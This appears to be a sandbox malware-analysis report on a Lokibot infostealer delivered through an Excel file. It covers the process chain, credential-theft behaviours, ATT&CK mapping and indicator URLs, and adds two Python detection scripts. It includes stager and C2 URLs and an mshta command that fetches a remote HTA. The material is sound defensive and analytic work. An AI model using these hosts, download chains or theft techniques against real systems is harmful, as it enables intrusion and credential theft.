                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Users\user\AppData\Roaming\caspol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: PopPassword 28_2_0040D069
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: SmtpPassword 28_2_0040D069
Source: Yara match | File source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix. The report's matrix grid is flattened here to one line per tactic, listing only the techniques that carry a signature-count badge; the digits in front of each technique are those badges, reproduced exactly as the matrix shows them. Techniques shown in the grid without a badge (template entries) are omitted.

Reconnaissance: no technique matched
Resource Development: 1 Scripting (placed in this column by the report's matrix)
Initial Access: no technique matched
Execution: 13 Exploitation for Client Execution; 11 Command and Scripting Interpreter; 1 Scheduled Task/Job; 3 PowerShell
Persistence: 1 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; 1 Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 31 Obfuscated Files or Information; 1 Install Root Certificate; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 111 Process Injection
Credential Access: 2 OS Credential Dumping; 2 Credentials in Registry
Discovery: 1 File and Directory Discovery; 14 System Information Discovery; 2 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery
Lateral Movement: no technique matched
Collection: 1 Archive Collected Data; 1 Browser Session Hijacking; 2 Data from Local System; 11 Email Collection; 1 Clipboard Data
Command and Control: 15 Ingress Tool Transfer; 11 Encrypted Channel; 4 Non-Application Layer Protocol; 125 Application Layer Protocol
Exfiltration: no technique matched
Impact: no technique matched
Behavior Graph ID: 1559095 | Sample: Payment Advice.xls | Start date: 20/11/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures

Process tree reconstructed from the graph. Numbers in parentheses are the graph's node IDs; where the graph shows counters next to a process (created registry values and created files) they are given after the node ID. "->" marks a child process.

EXCEL.EXE (9; counters 57, 53), started by the sample
    Network: 192.3.243.136, ports 49164, 49166, 49167 (AS-COLOCROSSINGUS, United States); provit.uk 198.244.140.41, port 443, local ports 49163, 49165 (RIDLEYSD-NETUS, United States)
    Dropped: C:\Users\user\...\Payment Advice.xls (copy), Composite; C:\Users\user\...\~DF6CCF4596F2406470.TMP, Composite; greetingwithgreatt...sgivenmeback[1].hta, HTML
    Signatures: Microsoft Office drops suspicious files
    -> mshta.exe (16; counter 10)
        Network: provit.uk
        Signatures: Suspicious powershell command line found; PowerShell case anomaly found
        -> powershell.exe (26; counter 23)
            Dropped: C:\Users\user\AppData\Roaming\caspol.exe, PE32; C:\Users\user\AppData\Local\...\caspol[1].exe, PE32; C:\Users\user\AppData\...\i4ik0bio.cmdline, Unicode
            Signatures: Powershell drops PE file
            -> caspol.exe (40; counter 5)
                Dropped: C:\Users\user\AppData\...\rrwscqkDSNwLK.exe, PE32; C:\Users\user\AppData\Local\...\tmpAAE0.tmp, XML
                Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Uses schtasks.exe or at.exe to add and modify task schedules
                -> caspol.exe (54)
                    Network: 94.156.177.41, ports 49168, 49169, 49170 (NET1-ASBG, Bulgaria)
                    Dropped: C:\Users\user\AppData\...\5879F5.exe (copy), PE32
                    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
                -> powershell.exe (59; counter 4)
                -> powershell.exe (61)
                -> schtasks.exe (63)
            -> powershell.exe (44; counter 4)
                Signatures: Installs new ROOT certificates
            -> csc.exe (46; counter 2)
                Dropped: C:\Users\user\AppData\Local\...\i4ik0bio.dll, PE32
                -> cvtres.exe (65)
    -> mshta.exe (20)
        Network: provit.uk
        -> powershell.exe (30)
            -> caspol.exe (48)
                Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                -> powershell.exe (67)
                -> powershell.exe (69)
                -> 2 other processes (73)
            -> csc.exe (50)
                Dropped: C:\Users\user\AppData\Local\...\zpwvvpvf.dll, PE32
                -> cvtres.exe (71)
            -> powershell.exe (52)
    -> AcroRd32.exe (22)
taskeng.exe (14), started by the sample
    -> rrwscqkDSNwLK.exe (24)
        Signatures: Antivirus detection for dropped file; Tries to steal Mail credentials (via file registry); Machine Learning detection for dropped file; 2 other signatures
        -> powershell.exe (32)
        -> powershell.exe (34)
        -> schtasks.exe (36)
        -> rrwscqkDSNwLK.exe (38)
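The chain in the behavior graph (EXCEL.EXE spawning mshta.exe, mshta.exe spawning PowerShell, PowerShell dropping and starting caspol.exe from AppData\Roaming and invoking csc.exe, caspol.exe registering a scheduled task, and taskeng.exe later launching the renamed loader from the user profile) is what a process-creation detection should key on. The script below is an added example and is not part of the Joe Sandbox report: it scans process-creation events, flags parent/child pairs that match the edges of this graph, flags caspol.exe running outside the .NET Framework directory it ships in, and flags anything the task scheduler launches from under AppData. The events, PIDs, paths and command lines are constructed to mimic Sysmon Event ID 1 records; none of them are taken from the report.

```python
"""Detect the process chain from the behavior graph above in process-creation logs.

Added example, not part of the Joe Sandbox report. SAMPLE_EVENTS is constructed
to mimic Sysmon Event ID 1 records; PIDs, paths and command lines are made up.
"""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str            # full image path, Windows style
    command_line: str = ""


@dataclass
class Finding:
    kind: str             # "chain", "masquerade" or "task_from_profile"
    pid: int
    chain: list           # ancestry, root first, lower-cased image basenames
    detail: str


# Parent -> child edges taken from the report's behavior graph.
SUSPICIOUS_EDGES = {
    ("excel.exe", "mshta.exe"),          # Office spawning the HTA host
    ("mshta.exe", "powershell.exe"),     # HTA handing off to PowerShell
    ("powershell.exe", "caspol.exe"),    # PowerShell starting the dropped loader
    ("powershell.exe", "csc.exe"),       # on-the-fly C# compilation
    ("caspol.exe", "schtasks.exe"),      # loader registering a scheduled task
    ("caspol.exe", "powershell.exe"),    # loader spawning PowerShell (Defender exclusion)
}

# caspol.exe is a .NET Framework tool; a copy anywhere else is a masquerade.
LEGIT_DOTNET_PREFIX = "c:\\windows\\microsoft.net\\"
# The graph shows taskeng.exe starting the renamed loader from AppData\Roaming.
TASK_HOSTS = {"taskeng.exe", "svchost.exe"}


def image_name(image: str) -> str:
    return ntpath.basename(image).lower()


def ancestry(event, by_pid):
    """Walk parent pointers to the root; the seen-set guards against PID-reuse loops."""
    chain, seen, cur = [], set(), event
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(image_name(cur.image))
        cur = by_pid.get(cur.ppid)
    chain.reverse()
    return chain


def analyze(events):
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        if parent is not None:
            edge = (image_name(parent.image), name)
            if edge in SUSPICIOUS_EDGES:
                findings.append(Finding("chain", e.pid, ancestry(e, by_pid),
                                        f"{edge[0]} -> {edge[1]}: {e.command_line}"))
            if edge[0] in TASK_HOSTS and "\\appdata\\" in e.image.lower():
                findings.append(Finding("task_from_profile", e.pid, ancestry(e, by_pid),
                                        f"scheduled task ran {e.image}"))
        if name == "caspol.exe" and not e.image.lower().startswith(LEGIT_DOTNET_PREFIX):
            findings.append(Finding("masquerade", e.pid, ancestry(e, by_pid),
                                    f"caspol.exe outside the .NET Framework directory: {e.image}"))
    return findings


# Constructed sample events (not from the report).
SAMPLE_EVENTS = [
    ProcEvent(400, 1, r"C:\Windows\explorer.exe"),
    ProcEvent(1000, 400, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", '"EXCEL.EXE" "Payment Advice.xls"'),
    ProcEvent(1016, 1000, r"C:\Windows\System32\mshta.exe", "mshta.exe http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta"),
    ProcEvent(1026, 1016, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -w hidden -enc ..."),
    ProcEvent(1040, 1026, r"C:\Users\user\AppData\Roaming\caspol.exe", r"C:\Users\user\AppData\Roaming\caspol.exe"),
    ProcEvent(1046, 1026, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", "csc.exe /noconfig /fullpaths @i4ik0bio.cmdline"),
    ProcEvent(1063, 1040, r"C:\Windows\System32\schtasks.exe", "schtasks.exe /Create /XML tmpAAE0.tmp /TN task"),
    ProcEvent(500, 1, r"C:\Windows\System32\taskeng.exe"),
    ProcEvent(1090, 500, r"C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"),
    # benign activity that must not fire
    ProcEvent(2000, 400, r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    ProcEvent(2001, 2000, r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    ProcEvent(3000, 400, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe", "caspol.exe -m -lg"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.kind}] pid={f.pid} {' > '.join(f.chain)}  {f.detail}")
```

The ancestry walk is what turns a single noisy edge (PowerShell spawning csc.exe is common in admin tooling) into something triageable: a csc.exe whose lineage runs back through mshta.exe to EXCEL.EXE is a different event from one under an IDE. The legitimate caspol.exe under C:\Windows\Microsoft.NET\ is deliberately included so the masquerade check is tested in both directions.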

Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
Payment Advice.xls | 21% | ReversingLabs | Win32.Exploit.CVE-2017-0199
Payment Advice.xls | 25% | Virustotal | (link: Browse)
Payment Advice.xls | 100% | Avira | TR/AVI.Agent.xoswb
Payment Advice.xls | 100% | Joe Sandbox ML |

Dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | 100% | Avira | HEUR/AGEN.1306899
C:\Users\user\AppData\Local\Temp\~DF6CCF4596F2406470.TMP | 100% | Avira | TR/AVI.Agent.xoswb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe | 100% | Avira | HEUR/AGEN.1306899
C:\Users\user\AppData\Roaming\caspol.exe | 100% | Avira | HEUR/AGEN.1306899
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\caspol.exe | 100% | Joe Sandbox ML |

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs (Source | Detection | Scanner | Label):
http://crl.entrust.n? | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htavf | 0% | Avira URL Cloud | safe
http://192.3.243.136/ | 0% | Avira URL Cloud | safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.hta | 0% | Avira URL Cloud | safe
94.156.177.41/simple/five/fre.php | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta.. | 0% | Avira URL Cloud | safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion/k | 0% | Avira URL Cloud | safe
https://provit.uk/~ | 0% | Avira URL Cloud | safe
https://provit.uk/ | 0% | Avira URL Cloud | safe
http://192.3.243.136/55/caspol.exe | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htadf | 0% | Avira URL Cloud | safe
http://192.3.243.136/55/caspol.e | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaZf | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC: | 0% | Avira URL Cloud | safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion2 | 0% | Avira URL Cloud | safe
http://192.3.243.136/55/caspol.exep | 0% | Avira URL Cloud | safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionvc | 0% | Avira URL Cloud | safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion0k | 0% | Avira URL Cloud | safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion | 0% | Avira URL Cloud | safe
https://provit.uk/J | 0% | Avira URL Cloud | safe
http://94.156.177.41/simple/five/fre.php | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaV8 | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta38 | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta=8 | 0% | Avira URL Cloud | safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionket | 0% | Avira URL Cloud | safe
https://provit.uk/: | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaHf | 0% | Avira URL Cloud | safe
http://192.3.243.136/55/caspol.exe6 | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta$1 | 0% | Avira URL Cloud | safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion? | 0% | Avira URL Cloud | safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaht | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
provit.uk | 198.244.140.41 | active: true | malicious: false | antivirus detection: none | reputation: unknown
URLs (Name | Malicious | Antivirus Detection | Reputation):
Name: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
Malicious: true
• Avira URL Cloud: safe
unknown
Name: 94.156.177.41/simple/five/fre.php
Malicious: true
• Avira URL Cloud: safe
unknown
Name: http://192.3.243.136/55/caspol.exe
Malicious: true
• Avira URL Cloud: safe
unknown
Name: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion
Malicious: false
• Avira URL Cloud: safe
unknown
Name: http://kbfvzoboss.bid/alien/fre.php
Malicious: false
high
Name: http://alphastand.top/alien/fre.php
Malicious: false
high
Name: http://alphastand.win/alien/fre.php
Malicious: false
high
Name: http://alphastand.trade/alien/fre.php
Malicious: false
high
Name: http://94.156.177.41/simple/five/fre.php
Malicious: true
• Avira URL Cloud: safe
unknown
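The URL table above gives the stager host (192.3.243.136 serving the .hta and caspol.exe), the second HTA host (provit.uk) and the Lokibot C2 gate 94.156.177.41/simple/five/fre.php; the four kbfvzoboss.bid and alphastand.* entries are Lokibot's well-known built-in fallback URLs, which is why they show up in the extracted configuration of most samples of the family. The script below is an added example and is not part of the Joe Sandbox report: it normalises these indicators to host plus path, then scans web-proxy log lines for exact URL matches, host-only matches, and the generic Lokibot gate pattern (an HTTP POST to a path ending in /fre.php), so that a panel on a host not yet in the indicator list is still caught. The log lines are constructed for the example and the log format (timestamp, client, method, URL, status) is an assumption.

```python
"""Match proxy-log URLs against the C2/stager indicators from the URL table above.

Added example, not part of the Joe Sandbox report. SAMPLE_LOG is constructed;
the space-separated "timestamp client method url status" format is an assumption.
"""
from urllib.parse import urlsplit

# Indicators copied from the report's URL table (some are listed without a scheme).
REPORT_URLS = [
    "http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta",
    "http://192.3.243.136/55/caspol.exe",
    "https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion",
    "94.156.177.41/simple/five/fre.php",
    "http://kbfvzoboss.bid/alien/fre.php",
    "http://alphastand.top/alien/fre.php",
    "http://alphastand.win/alien/fre.php",
    "http://alphastand.trade/alien/fre.php",
]


def normalize(url: str):
    """Return (host, path) with the query string dropped; scheme-less entries are accepted."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return parts.hostname.lower(), (parts.path or "/")


def build_indicators(urls):
    """Exact (host, path) pairs plus the set of hosts, for weaker host-only matching."""
    exact = {normalize(u) for u in urls}
    hosts = {host for host, _ in exact}
    return exact, hosts


def parse_line(line: str):
    ts, client, method, url, status = line.split()
    return {"ts": ts, "client": client, "method": method.upper(), "url": url, "status": status}


def scan(log_lines, indicators):
    """Return (client, kind, url) tuples; kind is ioc_url, ioc_host or lokibot_gate."""
    exact, hosts = indicators
    hits = []
    for line in log_lines:
        rec = parse_line(line)
        host, path = normalize(rec["url"])
        if (host, path) in exact:
            hits.append((rec["client"], "ioc_url", rec["url"]))
        elif host in hosts:
            hits.append((rec["client"], "ioc_host", rec["url"]))
        # Lokibot's panel gate is fre.php and the bot POSTs its harvest to it;
        # this catches panels whose host is not in the indicator list yet.
        if rec["method"] == "POST" and path.lower().endswith("/fre.php"):
            hits.append((rec["client"], "lokibot_gate", rec["url"]))
    return hits


# Constructed proxy log (not from the report).
SAMPLE_LOG = [
    "2024-11-20T10:00:01Z 10.0.0.5 GET http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta 200",
    "2024-11-20T10:00:02Z 10.0.0.5 GET https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion 200",
    "2024-11-20T10:00:05Z 10.0.0.5 GET http://192.3.243.136/55/caspol.exe 200",
    "2024-11-20T10:00:09Z 10.0.0.5 POST http://94.156.177.41/simple/five/fre.php 404",
    "2024-11-20T10:00:10Z 10.0.0.5 GET http://192.3.243.136/favicon.ico 404",
    "2024-11-20T10:01:00Z 10.0.0.9 POST http://203.0.113.7/panel/fre.php 200",
    "2024-11-20T10:01:30Z 10.0.0.9 GET https://www.example.com/index.html 200",
    "2024-11-20T10:02:00Z 10.0.0.12 GET http://alphastand.top/alien/fre.php 200",
]

if __name__ == "__main__":
    for client, kind, url in scan(SAMPLE_LOG, build_indicators(REPORT_URLS)):
        print(f"{client:<10} {kind:<13} {url}")
```

Matching on host plus path rather than the full string matters for the provit.uk entry: the report shows it with a long decoy query string, and the same path will be requested with different queries. The fourth sample line shows why the gate heuristic is kept separate from the exact list: the C2 returning 404 is not evidence of a miss, and the POST-to-fre.php shape is the signal worth alerting on even when the host is new.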
URLs from memory strings (Name | Source | Malicious | Antivirus Detection | Reputation):
Name: http://192.3.243.136/
Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.hta
Source: mshta.exe, 00000004.00000002.432158239.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
• Avira URL Cloud: safe
unknown
Name: https://provit.uk/~
